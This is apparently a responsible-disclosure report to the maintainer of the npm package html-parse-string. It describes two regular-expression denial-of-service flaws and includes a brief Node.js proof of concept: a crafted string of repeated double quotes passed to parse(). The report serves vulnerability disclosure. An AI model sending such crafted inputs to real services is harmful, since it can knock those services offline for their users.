Hi,
I would like to report two Regular Expression Denial of Service (REDoS) vulnerabilities in html-parse-string.
They allow causing a denial of service when parsing crafted invalid HTML strings.
You can execute the code below to reproduce the vulnerability.
var htmlParseString = require("html-parse-string")
htmlParseString.parse('<!""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""!')
Feel free to contact me if you have any questions.
Best regards,
Yeting Li